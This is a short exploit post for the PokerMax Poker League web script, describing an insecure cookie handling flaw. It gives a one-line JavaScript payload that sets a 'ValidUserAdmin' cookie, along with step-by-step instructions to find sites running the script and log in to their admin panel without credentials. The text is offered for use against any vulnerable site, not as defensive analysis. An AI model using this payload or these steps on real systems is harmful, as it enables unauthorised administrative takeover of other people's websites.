************************************************************************************** Author : DaRkLiFe Greetz : str0ke & S.W.A.T. & funkys0ul ************************************************************************************** Script : PokerMax Poker League Insecure Cookie Handling Vulnerability Download: http://www.stevedawson.com/downloads/pokerleague.zip ************************************************************************************** Exploit : javascript:document.cookie = "ValidUserAdmin=admin"; **here "admin" refers to username of administrator on site default username is "admin" given after installation of site but if it is changed u can easily find out username of admin and then substitute it in place of "admin" ************************************************************************************** Instructions : Find the site running on this script . Go to http://site.com/pokerleague/pokeradmin/configure.php It will ask for login. Now in url tab run the exploit command Then return back to http://site.com/pokerleague/pokeradmin/configure.php Now u should be loggedin as admin and change the thing into what you want . ************************************************************************************** THANKS ! GREETZ ! HAPPY DIWALI ! **************************************************************************************